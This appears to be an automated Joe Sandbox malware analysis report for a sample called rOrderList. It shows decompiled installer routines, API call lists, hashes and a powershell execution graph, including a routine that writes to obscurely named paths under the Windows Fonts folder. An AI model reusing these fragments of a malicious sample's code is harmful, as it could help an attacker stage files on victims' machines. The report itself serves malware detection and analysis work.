                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: 4%w.%w$P_B
                                                                                      • API String ID: 3248276644-4116671133
                                                                                      • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                                                                                      • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
                                                                                      • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                                                                                      • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 58%
                                                                                      			E00405E11(WCHAR* _a4) {
                                                                                      				WCHAR* _t9;
                                                                                      
                                                                                      				_t9 = _a4;
                                                                                      				_push( &(_t9[lstrlenW(_t9)]));
                                                                                      				_push(_t9);
                                                                                      				if( *(CharPrevW()) != 0x5c) {
                                                                                      					lstrcatW(_t9, 0x40a014);
                                                                                      				}
                                                                                      				return _t9;
                                                                                      			}




                                                                                      0x00405e12
                                                                                      0x00405e1f
                                                                                      0x00405e20
                                                                                      0x00405e2b
                                                                                      0x00405e33
                                                                                      0x00405e33
                                                                                      0x00405e3b

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405E33
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-3355392842
                                                                                      • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                      • Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
                                                                                      • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                      • Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 92%
                                                                                      			E00402636(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                                      				signed int _t14;
                                                                                      				int _t17;
                                                                                      				void* _t24;
                                                                                      				intOrPtr* _t29;
                                                                                      				void* _t31;
                                                                                      				signed int _t32;
                                                                                      				void* _t35;
                                                                                      				void* _t40;
                                                                                      				signed int _t42;
                                                                                      
                                                                                      				_t29 = __edi;
                                                                                      				_t24 = __ebx;
                                                                                      				_t14 =  *(_t35 - 0x28);
                                                                                      				_t40 = __edx - 0x38;
                                                                                      				 *(_t35 - 0x10) = _t14;
                                                                                      				_t27 = 0 | _t40 == 0x00000000;
                                                                                      				_t32 = _t40 == 0;
                                                                                      				if(_t14 == __ebx) {
                                                                                      					if(__edx != 0x38) {
                                                                                      						_t17 = lstrlenW(E00402D3E(0x11)) + _t16;
                                                                                      					} else {
                                                                                      						E00402D3E(0x21);
                                                                                      						E0040655E("C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor", "C:\Users\Public\Documents\Trivialness\Nsketnkningers\Oplivningens.Agt->C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervalde", 0x400);
                                                                                      						_t17 = lstrlenA("C:\Users\Public\Documents\Trivialness\Nsketnkningers\Oplivningens.Agt->C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervalde");
                                                                                      					}
                                                                                      				} else {
                                                                                      					E00402D1C(1);
                                                                                      					 *0x40adf8 = __ax;
                                                                                      					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                                      				}
                                                                                      				 *(_t35 + 8) = _t17;
                                                                                      				if( *_t29 == _t24) {
                                                                                      					L13:
                                                                                      					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                      				} else {
                                                                                      					_t31 = E0040649C(_t27, _t29);
                                                                                      					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406113(_t31, _t31) >= 0) {
                                                                                      						_t14 = E004060E4(_t31, "C:\Users\Public\Documents\Trivialness\Nsketnkningers\Oplivningens.Agt->C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervalde",  *(_t35 + 8));
                                                                                      						_t42 = _t14;
                                                                                      						if(_t42 == 0) {
                                                                                      							goto L13;
                                                                                      						}
                                                                                      					} else {
                                                                                      						goto L13;
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t35 - 4));
                                                                                      				return 0;
                                                                                      			}












                                                                                      0x00402636
                                                                                      0x00402636
                                                                                      0x00402636
                                                                                      0x0040263b
                                                                                      0x0040263e
                                                                                      0x00402641
                                                                                      0x00402646
                                                                                      0x00402648
                                                                                      0x00402668
                                                                                      0x004026a2
                                                                                      0x0040266a
                                                                                      0x0040266c
                                                                                      0x00402680
                                                                                      0x0040268d
                                                                                      0x0040268d
                                                                                      0x0040264a
                                                                                      0x0040264c
                                                                                      0x00402651
                                                                                      0x0040265f
                                                                                      0x00402662
                                                                                      0x004026a7
                                                                                      0x004026aa
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x004026b0
                                                                                      0x004026b9
                                                                                      0x004026bb
                                                                                      0x004026da
                                                                                      0x004015b4
                                                                                      0x004015b6
                                                                                      0x00000000
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004026bb
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(C:\Users\Public\Documents\Trivialness\Nsketnkningers\Oplivningens.Agt->C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervalde), ref: 0040268D
                                                                                      Strings
                                                                                      • C:\Users\Public\Documents\Trivialness\Nsketnkningers\Oplivningens.Agt->C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervalde, xrefs: 00402651, 00402676, 00402688, 004026D4
                                                                                      • C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor, xrefs: 0040267B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: C:\Users\Public\Documents\Trivialness\Nsketnkningers\Oplivningens.Agt->C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervalde$C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor
                                                                                      • API String ID: 1659193697-1345619238
                                                                                      • Opcode ID: c0e9709f4414c123a9561e1ba197458eec5955b960e9bcf0ffe45126c9858767
                                                                                      • Instruction ID: 5d79e66603f7cd29b77c79f3cf3d62822218e64012773efd3f53c153c7218f52
                                                                                      • Opcode Fuzzy Hash: c0e9709f4414c123a9561e1ba197458eec5955b960e9bcf0ffe45126c9858767
                                                                                      • Instruction Fuzzy Hash: EC112772A40204ABCB00AFB18E4EA9E73719F54708F21443FE402B61C1EAFD8991561F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 89%
                                                                                      			E00405518(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                      				int _t15;
                                                                                      				long _t16;
                                                                                      
                                                                                      				_t15 = _a8;
                                                                                      				if(_t15 != 0x102) {
                                                                                      					if(_t15 != 0x200) {
                                                                                      						_t16 = _a16;
                                                                                      						L7:
                                                                                      						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                                                      							_push(_t16);
                                                                                      							_push(6);
                                                                                      							 *0x423734 = _t16;
                                                                                      							E00404ECD();
                                                                                      						}
                                                                                      						L11:
                                                                                      						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                                                      					}
                                                                                      					if(IsWindowVisible(_a4) == 0) {
                                                                                      						L10:
                                                                                      						_t16 = _a16;
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					_t16 = E00404E4D(_a4, 1);
                                                                                      					_t15 = 0x419;
                                                                                      					goto L7;
                                                                                      				}
                                                                                      				if(_a12 != 0x20) {
                                                                                      					goto L10;
                                                                                      				}
                                                                                      				E004044DE(0x413);
                                                                                      				return 0;
                                                                                      			}





                                                                                      0x0040551c
                                                                                      0x00405526
                                                                                      0x00405542
                                                                                      0x00405564
                                                                                      0x00405567
                                                                                      0x0040556d
                                                                                      0x00405577
                                                                                      0x00405578
                                                                                      0x0040557a
                                                                                      0x00405580
                                                                                      0x00405580
                                                                                      0x0040558a
                                                                                      0x00000000
                                                                                      0x00405598
                                                                                      0x0040554f
                                                                                      0x00405587
                                                                                      0x00405587
                                                                                      0x00000000
                                                                                      0x00405587
                                                                                      0x0040555b
                                                                                      0x0040555d
                                                                                      0x00000000
                                                                                      0x0040555d
                                                                                      0x0040552c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405533
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00405547
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                                                                                        • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                                                                                      • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
                                                                                      • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                                                                                      • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00405E5D(WCHAR* _a4) {
                                                                                      				WCHAR* _t5;
                                                                                      				WCHAR* _t7;
                                                                                      
                                                                                      				_t7 = _a4;
                                                                                      				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                      				while( *_t5 != 0x5c) {
                                                                                      					_push(_t5);
                                                                                      					_push(_t7);
                                                                                      					_t5 = CharPrevW();
                                                                                      					if(_t5 > _t7) {
                                                                                      						continue;
                                                                                      					}
                                                                                      					break;
                                                                                      				}
                                                                                      				 *_t5 =  *_t5 & 0x00000000;
                                                                                      				return  &(_t5[1]);
                                                                                      			}





                                                                                      0x00405e5e
                                                                                      0x00405e68
                                                                                      0x00405e6b
                                                                                      0x00405e71
                                                                                      0x00405e72
                                                                                      0x00405e73
                                                                                      0x00405e7b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405e7b
                                                                                      0x00405e7d
                                                                                      0x00405e85

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405E63
                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405E73
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3370423016
                                                                                      • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                      • Instruction ID: 42216084ebed45f2f1fcdcce66f7b00f69915d90115442600aae12f46dcfca4c
                                                                                      • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                      • Instruction Fuzzy Hash: 65D05EB2401D209AC3226718DD04DAF73ACEF5134074A482AE582A61A4D7785E8186E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405F97(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                      				int _v8;
                                                                                      				int _t12;
                                                                                      				int _t14;
                                                                                      				int _t15;
                                                                                      				CHAR* _t17;
                                                                                      				CHAR* _t27;
                                                                                      
                                                                                      				_t12 = lstrlenA(_a8);
                                                                                      				_t27 = _a4;
                                                                                      				_v8 = _t12;
                                                                                      				while(lstrlenA(_t27) >= _v8) {
                                                                                      					_t14 = _v8;
                                                                                      					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                      					_t15 = lstrcmpiA(_t27, _a8);
                                                                                      					_t27[_v8] =  *(_t14 + _t27);
                                                                                      					if(_t15 == 0) {
                                                                                      						_t17 = _t27;
                                                                                      					} else {
                                                                                      						_t27 = CharNextA(_t27);
                                                                                      						continue;
                                                                                      					}
                                                                                      					L5:
                                                                                      					return _t17;
                                                                                      				}
                                                                                      				_t17 = 0;
                                                                                      				goto L5;
                                                                                      			}









                                                                                      0x00405fa7
                                                                                      0x00405fa9
                                                                                      0x00405fac
                                                                                      0x00405fd8
                                                                                      0x00405fb1
                                                                                      0x00405fba
                                                                                      0x00405fbf
                                                                                      0x00405fca
                                                                                      0x00405fcd
                                                                                      0x00405fe9
                                                                                      0x00405fcf
                                                                                      0x00405fd6
                                                                                      0x00000000
                                                                                      0x00405fd6
                                                                                      0x00405fe2
                                                                                      0x00405fe6
                                                                                      0x00405fe6
                                                                                      0x00405fe0
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBF
                                                                                      • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                      • Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
                                                                                      • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                      • Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:7.4%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:99
                                                                                      Total number of Limit Nodes:7
                                                                                      execution_graph 72421 7de39fd 72423 7de3999 72421->72423 72422 7de3a2e 72423->72422 72427 7de7c88 72423->72427 72434 7de7c78 72423->72434 72441 7de7c7c 72423->72441 72428 7de7cb5 72427->72428 72448 7de8570 72428->72448 72452 7de857c 72428->72452 72456 7de8578 72428->72456 72460 7de8580 72428->72460 72429 7de7d09 72435 7de7c82 72434->72435 72437 7de857c GetFileAttributesW 72435->72437 72438 7de8578 GetFileAttributesW 72435->72438 72439 7de8580 GetFileAttributesW 72435->72439 72440 7de8570 GetFileAttributesW 72435->72440 72436 7de7d09 72437->72436 72438->72436 72439->72436 72440->72436 72442 7de7c84 72441->72442 72444 7de857c GetFileAttributesW 72442->72444 72445 7de8578 GetFileAttributesW 72442->72445 72446 7de8580 GetFileAttributesW 72442->72446 72447 7de8570 GetFileAttributesW 72442->72447 72443 7de7d09 72443->72443 72444->72443 72445->72443 72446->72443 72447->72443 72449 7de857a 72448->72449 72450 7de85d8 72449->72450 72464 4575018 72449->72464 72450->72429 72453 7de8580 72452->72453 72454 7de85d8 72453->72454 72455 4575018 GetFileAttributesW 72453->72455 72454->72429 72455->72454 72457 7de857a 72456->72457 72458 7de85d8 72457->72458 72459 4575018 GetFileAttributesW 72457->72459 72458->72429 72459->72458 72461 7de8594 72460->72461 72462 7de85d8 72461->72462 72463 4575018 GetFileAttributesW 72461->72463 72462->72429 72463->72462 72470 4575018 GetFileAttributesW 72464->72470 72471 4575078 72464->72471 72465 4575042 72466 4575048 72465->72466 72476 45747c8 72465->72476 72466->72450 72470->72465 72472 4575090 72471->72472 72473 45750a5 72472->72473 72474 45747c8 GetFileAttributesW 72472->72474 72473->72465 72475 45750d6 72474->72475 72475->72465 72478 4575560 GetFileAttributesW 72476->72478 72479 45750d6 72478->72479 72479->72450 72497 4571590 72498 45715a2 72497->72498 72502 4574948 72498->72502 72507 4574958 72498->72507 72499 45715d2 72503 4574958 72502->72503 72504 4574987 72503->72504 72512 4574a10 72503->72512 72517 4574a00 72503->72517 72504->72499 72509 457495c 72507->72509 72508 4574987 72508->72499 72509->72508 72510 4574a10 GetFileAttributesW 72509->72510 72511 4574a00 GetFileAttributesW 72509->72511 72510->72508 72511->72508 72513 4574a14 72512->72513 72522 4574a78 72513->72522 72528 4574a88 72513->72528 72514 4574a41 72514->72504 72518 4574a10 72517->72518 72520 4574a78 GetFileAttributesW 72518->72520 72521 4574a88 GetFileAttributesW 72518->72521 72519 4574a41 72519->72504 72520->72519 72521->72519 72523 4574a9d 72522->72523 72525 4574ba5 72523->72525 72527 4575018 GetFileAttributesW 72523->72527 72524 4574b63 72524->72525 72526 4575018 GetFileAttributesW 72524->72526 72525->72514 72526->72525 72527->72524 72530 4574a9d 72528->72530 72529 4574ba5 72529->72514 72530->72529 72533 4575018 GetFileAttributesW 72530->72533 72531 4574b63 72531->72529 72532 4575018 GetFileAttributesW 72531->72532 72532->72529 72533->72531 72480 87aba50 72481 87abcdb 72480->72481 72482 87aba79 72480->72482 72483 87abaf6 72482->72483 72485 87ac288 72482->72485 72486 87ac2b0 72485->72486 72488 87ac426 72486->72488 72489 87ab730 72486->72489 72490 87ac940 SetThreadUILanguage 72489->72490 72492 87ac9b1 72490->72492 72492->72488 72493 87ac240 72494 87ac26e 72493->72494 72495 87ac24c 72493->72495 72495->72494 72496 87ac288 SetThreadUILanguage 72495->72496 72496->72495 72534 7de3813 72537 7de3827 72534->72537 72535 7de3a46 72536 7de3a2e 72536->72536 72537->72535 72537->72536 72538 7de7c7c GetFileAttributesW 72537->72538 72539 7de7c88 GetFileAttributesW 72537->72539 72540 7de7c78 GetFileAttributesW 72537->72540 72538->72537 72539->72537 72540->72537
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 364a47df63eb9f286c26354bc312cd4529868febf457bb03da31672f440a9515
                                                                                      • Instruction ID: 897d72054f6afcecbe496267a1e568cf8eb676547d8d11ac18140947130377d4
                                                                                      • Opcode Fuzzy Hash: 364a47df63eb9f286c26354bc312cd4529868febf457bb03da31672f440a9515
                                                                                      • Instruction Fuzzy Hash: 4B323834A00224CFDB24DB69C954BADB7F2BF88311F2580A9D40AAB359DB359D81CF65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
